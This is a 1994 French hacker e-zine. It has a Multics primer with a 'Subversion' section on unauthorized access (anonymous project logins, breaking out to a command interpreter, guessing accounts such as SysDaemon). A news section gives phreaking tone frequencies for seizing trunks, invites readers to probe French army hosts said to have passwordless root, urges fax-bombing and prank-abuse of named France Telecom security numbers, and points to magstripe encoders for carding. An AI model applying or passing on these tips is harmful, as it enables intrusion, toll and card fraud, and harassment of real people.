Le systeme est tres vaste donc ce texte ne sera qu'une presentation de
|
||
Multics.
|
||
|
||
1 Reconnaitre un Multics:
|
||
------------------------
|
||
Au login, la pluspart du temps, quand on se connecte sur un Multics, il
|
||
affiche:
|
||
<system> MULTICS version MRxx # o— xx est le numero de la version
|
||
Channel dhyyy at hhmm.s # yyy : canal de communication
|
||
# hhmm.s : heure format militaire
|
||
up since hhmm.s # date du dernier boot.
|
||
quelques autres informations et puis plus rien:
|
||
c'est la periode de prelogin.
|
||
|
||
1.1 Prelogin:
|
||
------------
|
||
Si vous connaissez les Cyber de Control Data Corporation comme les CDC960,
|
||
CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode
|
||
de prelogin.
|
||
Celle ci est generalement limitee (environ a 2mn).
|
||
Le prelogin comporte plusieurs commandes primaires sous Multics:
|
||
help
|
||
l
|
||
et d'autres commandes de login anonyme sous un projet.
|
||
|
||
En effet, la gestion des utilisateurs sous MULTICS se fait par projet.
|
||
Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point
|
||
de vue gestion. On designe un compte comme cela:
|
||
<Username>.<PROJECT>
|
||
Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste
|
||
le <Username>. Dans le dernier cas, le programme de login va detecter a quel
|
||
projet appartient cet utilisateur.
|
||
|
||
Une fonction interessante est la fonction de login anonyme.
|
||
En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce
|
||
projet.
|
||
La syntaxe de cette commande est donnee au prelogin par le message de la
|
||
commande help.
|
||
|
||
1.2 Les principes:
|
||
-----------------
|
||
* Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte
|
||
fait toujours partie d'un groupe appele 'projet'. On peut donc se logger
|
||
anonymement sous un projet sans avoir de nom de compte. On sera donc
|
||
identifie comme anonyme du projet xxxxx.
|
||
Un user peut faire partie de plusieurs projets.
|
||
* Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule.
|
||
* Un 'segment' est le nom donne sous multics aux fichiers.
|
||
* un chemin est indique non pas avec des slash ('/') comme sous unix mais
|
||
avec des signes superieur: '>'
|
||
ex: >udd>PROJET>User
|
||
* le directory >udd> est le directory qui contient toutes les infos concernant
|
||
le utilisateurs.
|
||
* Se deplacer dans l'arborescence:
|
||
Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans
|
||
'>udd', il suffit te taper 'cwd <'.
|
||
Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans
|
||
'>udd>PROJET2>user1', il faut taper:
|
||
cwd <user1
|
||
* Dans la logique Multics, < equivaut a .. sous Unix et sous DOS (peurk...
|
||
je parle encore de cet OS pourri, le DOS.... bouhhh)
|
||
|
||
1.3 Les commandes:
|
||
-----------------
|
||
Voici une liste simple et absolument non exhaustive des commandes de multics;
|
||
ce sont les principales.
|
||
help <topic> : aide en ligne
|
||
ls : liste des fichiers sur directory courant
|
||
cwd <path> : pwd afficher le nom du directory courant
|
||
cd <newpath> : creer un nouveau directory dans le directory courant
|
||
dl <sedgment> : effacer un segment
|
||
who : affiche un court message sur l'etat de la machine et affiche
|
||
la liste des users actuellements connectes sur la machine.
|
||
whom : meme chose mais en classant les utilisateurs par projets.
|
||
sm : envoyer un message a un utilisateur online (equivalent a
|
||
write sous unix).
|
||
sdm : envoyer un courrier a un utilisateur.
|
||
Si la machine est connectee a un reseau comme Internet,
|
||
pour envoyer un mail a scc@nic.ddn.mil, il faut taper:
|
||
sdm scc -at nic.ddn.mil
|
||
rdm : lire sa boite aux lettres.
|
||
memo : systeme d'agenda tres evolue.
|
||
pr : affiche un segment a l'ecran.
|
||
ted : editeur ligne a ligne type ED.
|
||
emacs : editeur pleine page que vous connaissez.
|
||
l'utilisation de cet editeur est impossible avec une
|
||
liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca!
|
||
basic : appel du compilateur basic.
|
||
pascal : appel du compilateur pascal.
|
||
calendar : affichage de calendrier.
|
||
date : affiche la date.
|
||
time : affiche l'heure.
|
||
st <filename> : affiche le statut d'un segment ou d'un directory.
|
||
la : liste des droits d'acces sur un segment ou un directory.
|
||
sa : etablit les droits d'acces sur un segment ou un directory.
|
||
logout : quitter Multics.
|
||
crossnet : envoyer du mail a travers differents r‚seaux.
|
||
|
||
2 Subversion:
|
||
------------
|
||
Par la methode de login anonymous, nous pouvont subvertir MULTICS en
|
||
reperant par un acces public qui est sous un certain projet.
|
||
Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi,
|
||
MULTICS affiche en debut de connexion des infos dont le projet.
|
||
Il suffit ensuite de faire un login anonyme sur ce projet.
|
||
|
||
Deuxieme methode.
|
||
Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le
|
||
programme.
|
||
Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D
|
||
ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN.
|
||
Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande.
|
||
|
||
Methode traditionnelle:
|
||
Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke)
|
||
N'oubliez jamais que le permier caractere de Username doit toujours etre en
|
||
majuscule. Essayez les entrees communes.
|
||
ex: SysDaemon (celui ci, je l'ai jamais vu 'open')
|
||
|
||
3 Then... the end:
|
||
-----------------
|
||
Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet
|
||
et tellement peu repandu, que ce serait de la perte de temps de vous expliquer
|
||
tout si vous n'avez pas de becanne pour tester.
|
||
|
||
So long HPC[A]s men.
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.18
|
||
|
||
|
||
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
|
||
?) Tel - Trixx |)
|
||
@) By %)
|
||
B) NeurAlien I)
|
||
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
|
||
|
||
-
|
||
7 Septembre 1994
|
||
-
|
||
"A new race of hacker seems to be born, Ultimate Hackers" --Anonymous
|
||
|
||
|
||
Hohe les Hack/phreakERS, les telcos ‚voluent et nous aussi. En exclusivit‚
|
||
quelques news d'un peu partout dans le monde qui vont vous faire sauter au
|
||
plafond.
|
||
|
||
Tout d'abord la HOPE (Hacking On Planet Earth) s'est d‚roul‚e dans le chaos le
|
||
plus complet. Il y avait beaucoup de "well known hackers" et quelques
|
||
‚vennements interressants s'y sont d‚roul‚s.
|
||
(Knight Lightning & Taran King molestent (tentent tout au moins) une fille
|
||
pendant qu'ils discutent avec Win Schwartau et Agent Steal)
|
||
L'unix mis a disposition des participant a ‚t‚ hack‚ comme on pouvait s'y
|
||
attendre.
|
||
("Hey Razor, have a look at them... It could help...
|
||
- Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You
|
||
hacked my system?")
|
||
Le nouveau systeme du m‚tro de new york qui constituait le deuxiŠme d‚fi aux
|
||
hackers a lui aussi ‚t‚ vaicu. Il paraitrait (je ne l'ai pas vu) que la
|
||
personne l'ayant hack‚ soit actuellement recherch‚e. :)
|
||
(Fucking Pigz, GET A LIFE ! )
|
||
|
||
Au niveau des * Boxes, ca a fonctionn‚ dur apparemment dans une folie
|
||
d‚moniaque. Certains pays semblent avoir ‚t‚ ouverts et une effervescence chez
|
||
les phone phreaks semble confirmer les bruits de grands "breakthrough" en
|
||
matiŠre de phreaking. (R2 etc...)
|
||
|
||
Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines
|
||
d'appels par semaine sur SecTec. La nostalgie des anciens fait toujours peur
|
||
aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !)
|
||
|
||
Allez, un ptit amuse gueule pour les lecteurs de N0 Way:
|
||
Frequences pour la malaisie:
|
||
Key Forward: 2600 + 2400 Hz : 150 ms
|
||
Between: 2000 ms
|
||
Seize: 2400 Hz : 150 ms
|
||
Intervals: 150 ms
|
||
|
||
CCITT5:
|
||
======
|
||
Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic:
|
||
CCITT 5 serait utilis‚ au : Chili,
|
||
Philippines
|
||
South Africa
|
||
Colombie
|
||
Bresil
|
||
Essayez pour voir si ca passe...
|
||
|
||
Bribes r‚colt‚es un peu partout:
|
||
===============================
|
||
Saviez vous que GN Navetel fournit … la gendarmerie Canadienne des solutions
|
||
pour ecouter les transmissions de donn‚es et plus particulierement:
|
||
- les comms modems sur les BBS jusqu'au vitesse 28800.
|
||
- les comms satellites vers Taiwan & Singapour envoy‚es … 2Mbit/s aux
|
||
satellites par des "emissaires" de ces pays.
|
||
|
||
Afrique du Sud:
|
||
==============
|
||
2400/2600 puis 2400
|
||
Timings: 150/0/90/0 toujours en ms bien s–r
|
||
|
||
Chili:
|
||
=====
|
||
2400 ou 2550 pendant 3 secondes
|
||
seize: 2400 (ou 2460)
|
||
|
||
The recent hack:
|
||
===============
|
||
Net23 viens de se faire pirater. Net23 est un bon IP provider … New York.
|
||
Son administrateur qui a juste 15 ans ‚tait plutot vert. Well... qu'est ce qui
|
||
a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps?
|
||
Bref... pas kewl pour lui.
|
||
|
||
R2:
|
||
==
|
||
Pour seize'r un trunk en R2, il faut envoyer:
|
||
2040/2400 OU 2400/2400
|
||
ou == ou
|
||
2280 2280
|
||
ou ou
|
||
3000 3000
|
||
|
||
Nouvelles de l'arm‚e:
|
||
====================
|
||
L'arm‚e francaise a un beau reseau TCP/IP interne. C'est tres joli et c'est
|
||
dur d'y acceder. Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION:
|
||
des entrees avec root sans mot de passe!
|
||
tftp actif sur toutes les machines !
|
||
rexd en standard sur tous les HP.
|
||
Vous voulez vous marrer, essayez de votre caserne pref‚r‚e ! :)
|
||
|
||
Quelqu'un … faire chier:
|
||
=======================
|
||
Service de securit‚ de chez... FT:
|
||
Tel: (1) 44 44 22 22
|
||
Fax: (1) 42 68 19 38
|
||
Vous avez mon approbation pour donner le 44 44 22 22 comme num‚ro a v‚rifier
|
||
pour les achats par carte bleue ou num‚ro de rappel pour France Telecom pour
|
||
les renseignements quand vous etes dans une cabine.
|
||
Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour
|
||
envoyer 450 pages NOIRES au 42 68 19 38 !
|
||
|
||
La blague du jour:
|
||
=================
|
||
"Comment transforme t'on un 486 en un 8088?"
|
||
"- En installant windows."
|
||
[Kopyrite Phrack 46]
|
||
|
||
Mag stripe Reader / Coder:
|
||
=========================
|
||
Beaucoup de personnes recherches des lecteurs encodeurs de cartes magn‚tiques.
|
||
Voila ou les acheter...
|
||
CPU ADvance
|
||
Post Office Box 2434
|
||
Harwood Station
|
||
Littletown, MA 01460
|
||
USA
|
||
Fax: 508-624-4819
|
||
|
||
L'unit‚ coute 389 $ US et il y a 2 modeles:
|
||
un lecteur pr les pistes ISO 1 & 2
|
||
un autre pour les pistes ISO 2 & 3
|
||
Hehe.... Bon carding...
|
||
|
||
N0 Way recrute:
|
||
==============
|
||
Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux
|
||
ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de
|
||
FT.
|
||
Si votre oreiller est un Cisco 7000.
|
||
Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee
|
||
pour suivre les satellites de l'armee.
|
||
Si vous ne vous servez que d'une socket en raw IP pour faire du RPC.
|
||
Si vous vous servez de votre cafetiere pour faire des pates au caf‚ ;).
|
||
Si vous aimez router vous memes vos paquets en Source Routing.
|
||
Si vous etes n‚ dans une ‚prouvette de LSD 25.
|
||
|
||
Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les
|
||
trucs les plus d‚lirant, les plus techniques et les plus ‚clatants.
|
||
|
||
! Have phun wif that ! ++NeurAlien
|
||
|
||
On to the next one, on to the next one ! ! ! ++N.
|